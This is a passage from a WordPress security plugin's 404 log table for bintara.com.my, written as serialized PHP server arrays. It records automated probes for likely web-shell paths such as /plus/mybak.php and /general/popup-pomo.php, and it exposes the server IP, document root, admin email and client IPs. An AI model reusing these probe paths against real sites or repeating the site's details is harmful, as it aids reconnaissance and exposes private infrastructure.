:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-logs.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-logs.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZjS0kIBnEjhLICWLzObkQAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570296530.3523\";s:12:\"REQUEST_TIME\";s:10:\"1570296530\";}}','notice','2019-10-05 17:28:53','2019-10-05 17:28:50',35431728,37235408,'https://bintara.com.my/wp-logs.php',1,0,'51.68.11.211'),(27553,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.161.136.35\";s:11:\"REMOTE_PORT\";s:5:\"55317\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZjdE0IBnEjhLICWLzOgkAAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570299155.3633\";s:12:\"REQUEST_TIME\";s:10:\"1570299155\";}}','notice','2019-10-05 18:12:37','2019-10-05 18:12:35',35422920,37233792,'https://bintara.com.my/?page_id=18',1,0,'108.161.136.35'),(27554,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/general/popup-pomo.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZkELC82ximopEFXXu4BVQAAAM0\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZkELC82ximopEFXXu4BVQAAAM0\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZkELC82ximopEFXXu4BVQAAAM0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"118.178.192.107\";s:11:\"REMOTE_PORT\";s:5:\"40304\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:10:\"SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkELC82ximopEFXXu4BVQAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570309164.1067\";s:12:\"REQUEST_TIME\";s:10:\"1570309164\";}}','notice','2019-10-05 20:59:28','2019-10-05 20:59:24',35586656,37380872,'https://bintara.com.my/general/popup-pomo.php',1,0,'118.178.192.107'),(27839,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/myjs.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"29.5.121.226\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=e57a55a7750930a2d17873b7eebe13fb\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"29.5.121.226\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YqOBT1onqG4TOWhlGEwAAAQY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YqOBT1onqG4TOWhlGEwAAAQY\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YqOBT1onqG4TOWhlGEwAAAQY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"49897\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YqOBT1onqG4TOWhlGEwAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674856.2673\";s:12:\"REQUEST_TIME\";s:10:\"1570674856\";}}','notice','2019-10-10 02:34:17','2019-10-10 02:34:16',35052816,36855312,'https://bintara.com.my/plus/myjs.php',1,0,'29.5.121.226'),(27838,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/mycak.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"169.128.217.171\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=4090996b4a580e67b2e7ba75a0aab287\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"169.128.217.171\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YnxypZvX7@gJ12mO-oQAAAIM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YnxypZvX7@gJ12mO-oQAAAIM\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YnxypZvX7@gJ12mO-oQAAAIM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"49516\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YnxypZvX7@gJ12mO-oQAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674847.6898\";s:12:\"REQUEST_TIME\";s:10:\"1570674847\";}}','notice','2019-10-10 02:34:09','2019-10-10 02:34:08',35054888,36865760,'https://bintara.com.my/plus/mycak.php',1,0,'169.128.217.171'),(27837,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/mybak.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"132.134.92.161\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=73100f6c0c085ae32410f2fd4ee8dadd\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"132.134.92.161\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mybak.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mybak.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YlqyUrY9zjNB4MheuewAAAZM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mybak.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mybak.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YlqyUrY9zjNB4MheuewAAAZM\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mybak.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/mybak.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YlqyUrY9zjNB4MheuewAAAZM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"65430\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mybak.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/mybak.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YlqyUrY9zjNB4MheuewAAAZM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674838.4113\";s:12:\"REQUEST_TIME\";s:10:\"1570674838\";}}','notice','2019-10-10 02:34:00','2019-10-10 02:33:58',35042616,36852000,'https://bintara.com.my/plus/mybak.php',1,0,'132.134.92.161'),(27836,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/plus/ms.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"136.66.54.115\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=32739594eac8c28cefb55f24dd0daee2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"136.66.54.115\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/ms.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yin6YXSDJF91Gv2PyawAAAAs\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/ms.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yin6YXSDJF91Gv2PyawAAAAs\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/plus/ms.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yin6YXSDJF91Gv2PyawAAAAs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"64874\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:10:\"SCRIPT_URL\";s:12:\"/plus/ms.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6Yin6YXSDJF91Gv2PyawAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674826.9281\";s:12:\"REQUEST_TIME\";s:10:\"1570674826\";}}','notice','2019-10-10 02:33:48','2019-10-10 02:33:47',35055104,36863152,'https://bintara.com.my/plus/ms.php',1,0,'136.66.54.115'),(27835,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/plus/mp.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"159.122.94.174\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=cd70d0bbbacecfc46f54b526da3ffabd\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; 